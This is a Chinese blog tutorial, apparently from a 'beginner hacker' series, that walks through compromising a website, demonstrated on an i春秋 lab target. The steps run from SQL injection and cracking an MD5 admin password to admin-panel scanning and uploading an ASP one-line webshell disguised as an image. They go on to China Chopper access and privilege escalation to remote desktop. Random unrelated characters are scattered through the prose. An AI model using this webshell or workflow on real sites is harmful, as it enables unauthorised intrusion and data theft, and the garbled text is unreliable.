小白客帶你走進(jìn)黑客世界13之我是一個(gè)腳本小子

首先拳球,大家先跟著我一起背誦三字經(jīng)。


這是一篇在腳本小子的世界里流傳的比較廣的滲透三字經(jīng)珍特,也是拿下一個(gè)網(wǎng)站的基本思路祝峻。

何為腳本小子?一般來(lái)說(shuō)扎筒,我們通常會(huì)把以“黑客”自居并沾沾自喜的初學(xué)者叫做腳本小子莱找。腳本小子不像真正的黑客那樣發(fā)現(xiàn)系統(tǒng)漏洞,他們通常使用別人開發(fā)的程序來(lái)惡意破壞他人系統(tǒng)嗜桌。

通常的刻板印象為一位沒(méi)有尠履纾科經(jīng)驗(yàn)的少年,破壞無(wú)辜網(wǎng)站企圖使得他的朋友感到驚訝骨宠。他們常常從某些網(wǎng)站上復(fù)制腳本代碼谚赎,然后到處粘貼淫僻,卻并不一定明白他們的方法與原理。他們欽慕于黑客的能力與探索精神壶唤,但與黑客所不同的是雳灵,腳本小子通常只是對(duì)計(jì)算機(jī)系統(tǒng)有基礎(chǔ)了解與愛好,但并不注重程序語(yǔ)言闸盔、算法悯辙、和數(shù)據(jù)結(jié)構(gòu)的研究,雖然這些對(duì)于真正的黑客來(lái)說(shuō)是必須具備的素質(zhì)迎吵。


今天躲撰,小白帶你入門腳本小子。文章開頭一起朗讀的三字經(jīng)文不知道大家還有沒(méi)有印象击费。一般來(lái)說(shuō)拢蛋,最簡(jiǎn)單的滲透流程就來(lái)自這三字經(jīng):找注入-爆賬號(hào)-找后臺(tái)-傳小馬-拿權(quán)限。其中蔫巩,這個(gè)流程的每一個(gè)階段都有代表性的利用工具谆棱,先提前和大家介紹一下。

0x01 找注入 && 0x02 爆賬號(hào)

工具:啊D注入工具圆仔、椰樹垃瞧、Pangolin(穿山甲)、havij(胡蘿卜)

0x03 找后臺(tái)

工具:御劍后臺(tái)掃描坪郭、wwwscan掃描器

0x04 傳小馬

工具:各種一句話木馬个从、中國(guó)菜刀、中國(guó)蟻劍

0x05 拿權(quán)限

工具:pr提權(quán)工具歪沃、巴西烤肉提權(quán)工具

先不講工具的原理這些廢話嗦锐,下面開始直接帶你滲透一個(gè)網(wǎng)站。####


由于小白手上沒(méi)有對(duì)應(yīng)的實(shí)驗(yàn)環(huán)境沪曙,轉(zhuǎn)戰(zhàn)i春秋意推,直接利用i春秋網(wǎng)站上提供的環(huán)境為大家來(lái)演示。

地址: http://www.ichunqiu.com/racing

演示開始##

Setup 1 找注入###

打開桌面上的火狐瀏覽器珊蟀,出現(xiàn)如下圖的頁(yè)面


什么都不要想,直接上啊D注入工具


成功找到注入點(diǎn)外驱,如下圖所示育灸。

Setup2 爆賬號(hào)###

右鍵找到的注入點(diǎn)-注入檢測(cè)

點(diǎn)擊右上角的檢測(cè)開始注入檢測(cè)


最后得到網(wǎng)站的某個(gè)賬號(hào),用戶名是linhai昵宇,密碼為d7e15730ef9708c0磅崭。一般來(lái)說(shuō),數(shù)據(jù)庫(kù)存放的密碼應(yīng)該是經(jīng)過(guò)md5加密過(guò)的瓦哎,怎么破砸喻?別慌柔逼!

解密MD5網(wǎng)站: http://www.dmd5.com/


解密md5后得到密碼值為linhai19760812

Setup3 找后臺(tái)###

此步驟為找到網(wǎng)站的管理后臺(tái)。來(lái)人啊割岛,上工具愉适。


打開后開始掃描

接下來(lái),訪問(wèn)掃描到的后臺(tái)地址癣漆,登陸维咸。

地址:http://www.test.ichunqiu/admin/login.asp


直接登陸到網(wǎng)站的后臺(tái),到這里惠爽,是不是內(nèi)心還伴隨著一點(diǎn)小小的心動(dòng)呢?


Setup4 傳小馬###

由于是asp的站點(diǎn)癌蓖,確定需要的是asp一句話木馬,代碼為

<%eval request("x")%>婚肆,密碼為x

小白試了很多的上傳點(diǎn)租副,比如這里:


還有這里


這里

這里

但是!=闲浴用僧!功夫不負(fù)有心人,還是讓我找到了一個(gè)上傳點(diǎn)两残。

于是乎新建一個(gè)txt文檔永毅,寫上asp一句話<%eval request("x")%>,密碼是x人弓。并且把文件類型改成圖片沼死。也不要只寫一行代碼,不大不小崔赌,100行差不多意蛀。


然后上傳


接下來(lái)的思路就是利用網(wǎng)站的數(shù)據(jù)庫(kù)功能把我們上傳的文件后綴由jpg改成asp


然后,拿出我們的菜刀健芭,連接剛我們復(fù)制到根目錄的xbk.asp文件(木馬)

地址是:http://www.test.ichunqiu/xbk.asp县钥,密碼是x。


在空白處 右鍵-添加 慈迈,輸入木馬的地址和網(wǎng)站

Setup5 拿權(quán)限###

右鍵木馬的地址若贮,選擇 虛擬終端


輸入任意命令,發(fā)現(xiàn)沒(méi)有權(quán)限痒留,訪問(wèn)被拒絕

接下切換到回收站目錄下谴麦,回收站是幾個(gè)有限擁有執(zhí)行權(quán)限的目錄。


分別找到我們的提權(quán)三件套:cmd.exe伸头、pr.exe匾效、3389.bat

接著,將三件套上傳到回收站目錄下面恤磷,如下圖所示面哼。

接下來(lái)野宜,進(jìn)入我們上傳的cmd.exe的虛擬終端,執(zhí)行我們的提權(quán)三件套魔策。


執(zhí)行完成之后匈子,打遠(yuǎn)程連接,進(jìn)入服務(wù)器代乃。

至此旬牲,一個(gè)完整的滲透過(guò)程到此結(jié)束。

Ps:喜歡的留個(gè)贊b( ̄▽ ̄)d ~也可以關(guān)注專題:黑客師搁吓。

下一篇文章:小白客帶你走進(jìn)黑客世界14之論kali滲透的藝術(shù)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末原茅,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子堕仔,更是在濱河造成了極大的恐慌擂橘,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,496評(píng)論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件摩骨,死亡現(xiàn)場(chǎng)離奇詭異通贞,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)恼五,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,407評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門昌罩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人灾馒,你說(shuō)我怎么就攤上這事茎用。” “怎么了睬罗?”我有些...
    開封第一講書人閱讀 162,632評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵轨功,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我容达,道長(zhǎng)古涧,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,180評(píng)論 1 292
  • 正文 為了忘掉前任花盐,我火速辦了婚禮羡滑,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘算芯。我一直安慰自己柒昏,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,198評(píng)論 6 388
  • 文/花漫 我一把揭開白布也祠。 她就那樣靜靜地躺著,像睡著了一般近速。 火紅的嫁衣襯著肌膚如雪诈嘿。 梳的紋絲不亂的頭發(fā)上堪旧,一...
    開封第一講書人閱讀 51,165評(píng)論 1 299
  • 那天,我揣著相機(jī)與錄音奖亚,去河邊找鬼淳梦。 笑死,一個(gè)胖子當(dāng)著我的面吹牛昔字,可吹牛的內(nèi)容都是我干的爆袍。 我是一名探鬼主播,決...
    沈念sama閱讀 40,052評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼作郭,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼陨囊!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起夹攒,我...
    開封第一講書人閱讀 38,910評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤蜘醋,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后咏尝,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體压语,經(jīng)...
    沈念sama閱讀 45,324評(píng)論 1 310
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,542評(píng)論 2 332
  • 正文 我和宋清朗相戀三年编检,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了胎食。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,711評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡允懂,死狀恐怖厕怜,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情累驮,我是刑警寧澤酣倾,帶...
    沈念sama閱讀 35,424評(píng)論 5 343
  • 正文 年R本政府宣布,位于F島的核電站谤专,受9級(jí)特大地震影響躁锡,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜置侍,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,017評(píng)論 3 326
  • 文/蒙蒙 一映之、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧蜡坊,春花似錦杠输、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,668評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至据忘,卻和暖如春鹦牛,著一層夾襖步出監(jiān)牢的瞬間搞糕,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,823評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工曼追, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留窍仰,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,722評(píng)論 2 368
  • 正文 我出身青樓礼殊,卻偏偏與公主長(zhǎng)得像驹吮,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子晶伦,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,611評(píng)論 2 353

推薦閱讀更多精彩內(nèi)容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實(shí)現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 20,771評(píng)論 2 13
  • 我們接著上一篇的內(nèi)容來(lái)講碟狞。 Top 5 安全配置錯(cuò)誤 通常情況下,網(wǎng)站的管理人員如果沒(méi)有足夠的安全意識(shí)也可...
    小白客_ShowBlack閱讀 1,433評(píng)論 3 28
  • 最近張一山火了,他主演的警匪懸疑網(wǎng)劇余罪近忙,剛開播點(diǎn)擊量就破了億竭业。本著強(qiáng)烈的好奇心,我點(diǎn)開了這部劇及舍,想看看當(dāng)年那個(gè)機(jī)...
    情語(yǔ)不傷閱讀 4,343評(píng)論 31 77
  • 當(dāng)我問(wèn)你把喜歡的人刪了是什么感覺(jué)時(shí) 你回答是可能對(duì)他失望了未辆,或者是不喜歡他了 從我看到你回答的信息的一瞬間 我就明...
    啊怪221閱讀 177評(píng)論 0 0
  • 現(xiàn)在已經(jīng)十一點(diǎn)半了,心里有點(diǎn)小著急锯玛,因?yàn)檫€有每周一文的作業(yè)沒(méi)有完成咐柜。 先說(shuō)說(shuō)每周一文是怎么一回事。每周一文是李先生...
    杏花林閱讀 514評(píng)論 0 0